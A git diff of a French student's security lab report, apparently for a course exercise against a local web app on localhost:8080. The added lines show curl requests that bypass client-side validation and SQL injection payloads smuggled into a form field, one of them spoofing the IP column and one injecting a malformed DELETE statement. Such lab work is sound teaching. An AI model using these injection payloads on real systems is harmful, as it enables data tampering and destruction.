diff --git a/rendu.md b/rendu.md index a64c4545a540865de5e308d6b384cd9d27bf9f61..ac5053a8eb92eafbd060d5b9afcacb4cb0a6c720 100644 --- a/rendu.md +++ b/rendu.md @@ -18,7 +18,11 @@ Il ne peut etre efficace que si on ne peut pas modifier la page du site ce qui e * Votre commande curl En utilisant curl j'ai utiliser la commandee suivante : ->curl localhost:8080 --data-raw "chaine=Ma Chaine Evoyer par Curl /*-+ &submit=O +>curl localhost:8080 --data-raw "chaine=Ma Chaine Evoyer par Curl /*-+ &submit=O + +ou + +> curl -X POST -F "chaine=Ma propre chaine ?" localhost:8080 Cela a permit d'envoyer cette chaine de caractére sans passez par la validation du Script. @@ -28,9 +32,14 @@ Le script Js ne peut donc jammais trouver le chanp a vérifier. ## Question 3 -* Votre commande curl pour effacer la table +* Réalisez une injection SQL qui insérer une chaine dans la base de données, tout en faisant en sorte que le champ who +* soit rempli avec ce que vous aurez décidé (et non pas votre adresse IP). Verifiez que cela a fonctionné ensuite. +curl -X POST -F "chaine=Hey','8.8.8.8') #" localhost:8080 * Expliquez comment obtenir des informations sur une autre table +Si ici a la place de la chaine on ajoute une requette par exemple : +curl -X POST -F "chaine=Drop','8.8.8.8'); DELETE chaine WHERE 1=1 #" localhost:8080 + ## Question 4